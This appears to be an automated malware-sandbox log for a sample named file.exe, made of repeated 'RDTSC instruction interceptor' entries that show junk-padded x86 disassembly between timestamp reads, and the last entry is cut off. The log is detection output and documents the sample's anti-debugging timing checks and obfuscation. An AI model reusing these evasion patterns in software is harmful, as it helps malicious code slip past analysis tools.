Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501041B second address: 501045D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, dh 0x00000005 pushfd 0x00000006 jmp 00007F4D44D0519Ah 0x0000000b sub ecx, 4A3DEF78h 0x00000011 jmp 00007F4D44D0519Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b pushad 0x0000001c mov al, 1Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F4D44D051A7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500077B second address: 5000789 instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000789 second address: 50007A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50007A1 second address: 50007BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, dh 0x0000000d mov dx, si 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50007BA second address: 50007CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50007CF second address: 50007DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D45034D1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50007DF second address: 50007E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50007E3 second address: 500080B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F4D45034D29h 0x00000011 mov ah, CEh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500080B second address: 5000828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D44D051A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000828 second address: 500086F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F4D45034D23h 0x00000017 jmp 00007F4D45034D23h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500086F second address: 5000874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000874 second address: 500088E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500088E second address: 5000892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000892 second address: 50008AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50008AD second address: 50008B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50008B3 second address: 50008B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50008B7 second address: 50008F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d jmp 00007F4D44D051A8h 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4D44D051A7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50008F7 second address: 500092B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c jmp 00007F4D45034D1Eh 0x00000011 nop 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500092B second address: 5000973 instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, 3A35h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ebx, 6604B504h 0x00000012 pushfd 0x00000013 jmp 00007F4D44D0519Dh 0x00000018 adc cx, 5846h 0x0000001d jmp 00007F4D44D051A1h 0x00000022 popfd 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4D44D0519Dh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50009A2 second address: 50009CB instructions: 0x00000000 rdtsc 0x00000002 mov ah, 86h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a cmp dword ptr [ebp-04h], 00000000h 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 mov cl, 09h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 call 00007F4D45034D21h 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000A1C second address: 5000A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000A20 second address: 5000A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000A26 second address: 5000A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000A2C second address: 5000A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000A30 second address: 500003E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d pushad 0x0000000e jmp 00007F4D44D0519Bh 0x00000013 pushfd 0x00000014 jmp 00007F4D44D051A8h 0x00000019 and ax, CE58h 0x0000001e jmp 00007F4D44D0519Bh 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 retn 0004h 0x00000029 nop 0x0000002a cmp eax, 00000000h 0x0000002d setne al 0x00000030 xor ebx, ebx 0x00000032 test al, 01h 0x00000034 jne 00007F4D44D05197h 0x00000036 xor eax, eax 0x00000038 sub esp, 08h 0x0000003b mov dword ptr [esp], 00000000h 0x00000042 mov dword ptr [esp+04h], 00000000h 0x0000004a call 00007F4D4971CA2Dh 0x0000004f mov edi, edi 0x00000051 jmp 00007F4D44D051A1h 0x00000056 xchg eax, ebp 0x00000057 pushad 0x00000058 call 00007F4D44D0519Ch 0x0000005d pushad 0x0000005e popad 0x0000005f pop eax 0x00000060 push eax 0x00000061 push edx 0x00000062 call 00007F4D44D051A7h 0x00000067 pop eax 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500003E second address: 500010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F4D45034D24h 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4D45034D1Eh 0x00000015 add esi, 158DB738h 0x0000001b jmp 00007F4D45034D1Bh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F4D45034D28h 0x00000027 and esi, 26F53198h 0x0000002d jmp 00007F4D45034D1Bh 0x00000032 popfd 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F4D45034D24h 0x0000003d and si, 5BF8h 0x00000042 jmp 00007F4D45034D1Bh 0x00000047 popfd 0x00000048 mov bx, ax 0x0000004b popad 0x0000004c push FFFFFFFEh 0x0000004e jmp 00007F4D45034D22h 0x00000053 call 00007F4D45034D19h 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F4D45034D27h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500010C second address: 5000130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000130 second address: 5000136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000136 second address: 50001C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ch, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f mov bh, 54h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F4D44D0519Eh 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007F4D44D0519Bh 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F4D44D0519Fh 0x0000002d xor ecx, 5DBFFD3Eh 0x00000033 jmp 00007F4D44D051A9h 0x00000038 popfd 0x00000039 jmp 00007F4D44D051A0h 0x0000003e popad 0x0000003f pop eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F4D44D051A7h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50001C7 second address: 5000252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, B60Ah 0x00000007 push edx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c call 00007F4D45034D19h 0x00000011 pushad 0x00000012 mov bh, 7Ch 0x00000014 mov edx, ecx 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F4D45034D21h 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 pushad 0x00000022 mov esi, edx 0x00000024 mov cx, di 0x00000027 popad 0x00000028 mov eax, dword ptr [eax] 0x0000002a pushad 0x0000002b push esi 0x0000002c mov si, bx 0x0000002f pop ebx 0x00000030 popad 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 jmp 00007F4D45034D26h 0x0000003a pop eax 0x0000003b jmp 00007F4D45034D20h 0x00000040 mov eax, dword ptr fs:[00000000h] 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F4D45034D27h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000252 second address: 5000298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov ecx, 7F6E1D63h 0x00000010 mov ecx, 279B2CBFh 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov edx, 3CC22FB6h 0x0000001d mov di, 9142h 0x00000021 popad 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4D44D0519Bh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000298 second address: 500029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500029C second address: 50002A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50002A2 second address: 50002A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50002A8 second address: 50002AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50002AC second address: 500030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4D45034D28h 0x00000012 adc si, DD38h 0x00000017 jmp 00007F4D45034D1Bh 0x0000001c popfd 0x0000001d mov ecx, 6937376Fh 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F4D45034D22h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F4D45034D1Eh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500030C second address: 5000324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ch, bh 0x0000000f mov dl, cl 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000324 second address: 500035C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F4D45034D1Ah 0x0000000e sbb ecx, 6F0D5C58h 0x00000014 jmp 00007F4D45034D1Bh 0x00000019 popfd 0x0000001a mov ebx, ecx 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f movsx ebx, ax 0x00000022 mov si, 34A3h 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b mov ch, 7Ch 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500035C second address: 50003A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4D44D0519Dh 0x0000000c sbb ecx, 249ABAA6h 0x00000012 jmp 00007F4D44D051A1h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a jmp 00007F4D44D0519Eh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4D44D0519Eh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50003A9 second address: 50003F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F4D45034D26h 0x0000000f mov eax, dword ptr [75AF4538h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bl, 57h 0x00000019 jmp 00007F4D45034D26h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50003F0 second address: 5000448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4D44D051A4h 0x00000013 sbb al, FFFFFF98h 0x00000016 jmp 00007F4D44D0519Bh 0x0000001b popfd 0x0000001c jmp 00007F4D44D051A8h 0x00000021 popad 0x00000022 xor eax, ebp 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov si, bx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000448 second address: 5000482 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushfd 0x00000009 jmp 00007F4D45034D21h 0x0000000e adc al, FFFFFF96h 0x00000011 jmp 00007F4D45034D21h 0x00000016 popfd 0x00000017 pop eax 0x00000018 popad 0x00000019 push ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov ecx, edx 0x0000001f mov eax, edi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000482 second address: 5000502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4D44D0519Ch 0x00000009 sub cx, 40E8h 0x0000000e jmp 00007F4D44D0519Bh 0x00000013 popfd 0x00000014 mov ch, F0h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F4D44D051A1h 0x00000023 xor ah, 00000006h 0x00000026 jmp 00007F4D44D051A1h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F4D44D051A0h 0x00000032 or eax, 259115A8h 0x00000038 jmp 00007F4D44D0519Bh 0x0000003d popfd 0x0000003e popad 0x0000003f lea eax, dword ptr [ebp-10h] 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 mov bx, 5716h 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000502 second address: 5000508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000508 second address: 500054C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e pushad 0x0000000f mov eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F4D44D051A9h 0x00000019 xor si, 8B26h 0x0000001e jmp 00007F4D44D051A1h 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500054C second address: 50005C9 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [ebp-18h], esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4D45034D24h 0x00000012 sub ax, A7F8h 0x00000017 jmp 00007F4D45034D1Bh 0x0000001c popfd 0x0000001d popad 0x0000001e mov eax, dword ptr fs:[00000018h] 0x00000024 jmp 00007F4D45034D26h 0x00000029 mov ecx, dword ptr [eax+00000FDCh] 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F4D45034D1Eh 0x00000036 add ecx, 7A8D3188h 0x0000003c jmp 00007F4D45034D1Bh 0x00000041 popfd 0x00000042 pushad 0x00000043 movzx esi, di 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50005C9 second address: 50005EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 test ecx, ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e call 00007F4D44D051A5h 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50005EE second address: 5000632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F4D45034D5Fh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F4D45034D1Eh 0x00000016 xor cx, 3178h 0x0000001b jmp 00007F4D45034D1Bh 0x00000020 popfd 0x00000021 movzx eax, bx 0x00000024 popad 0x00000025 add eax, ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000632 second address: 500063C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 330B55F9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0137 second address: 4FF013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF013B second address: 4FF0141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0141 second address: 4FF0146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0146 second address: 4FF01A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4D44D0519Fh 0x0000000a jmp 00007F4D44D051A3h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F4D44D051A6h 0x00000019 push eax 0x0000001a jmp 00007F4D44D0519Bh 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4D44D051A0h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF01A9 second address: 4FF01AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF01AF second address: 4FF01E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 66h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4D44D051A2h 0x0000000f sub esp, 2Ch 0x00000012 jmp 00007F4D44D051A0h 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov cx, bx 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF027E second address: 4FF02B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4D45034D21h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF02B0 second address: 4FF02C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF02C5 second address: 4FF0322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a jmp 00007F4D45034D1Eh 0x0000000f test al, al 0x00000011 jmp 00007F4D45034D20h 0x00000016 je 00007F4D45034EC4h 0x0000001c jmp 00007F4D45034D20h 0x00000021 lea ecx, dword ptr [ebp-14h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4D45034D1Ah 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0322 second address: 4FF0328 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0328 second address: 4FF032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0369 second address: 4FF036D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF036D second address: 4FF038A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF038A second address: 4FF03B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4D44D051A1h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF03B8 second address: 4FF03CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF03CB second address: 4FF03FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [75AF86D4h] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 push FFFFFFFEh 0x00000016 push 76F8CA08h 0x0000001b push 76EFAE00h 0x00000020 mov eax, dword ptr fs:[00000000h] 0x00000026 push eax 0x00000027 sub esp, 0Ch 0x0000002a push ebx 0x0000002b push esi 0x0000002c push edi 0x0000002d mov eax, dword ptr [76FAB370h] 0x00000032 xor dword ptr [ebp-08h], eax 0x00000035 xor eax, ebp 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b mov dword ptr fs:[00000000h], eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 mov eax, dword ptr fs:[00000018h] 0x0000004a test eax, eax 0x0000004c je 00007F4D44D487E1h 0x00000052 mov dword ptr [ebp-04h], 00000000h 0x00000059 mov edx, dword ptr [ebp+08h] 0x0000005c mov dword ptr [eax+00000BF4h], edx 0x00000062 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000069 test edx, edx 0x0000006b je 00007F4D44D05239h 0x00000071 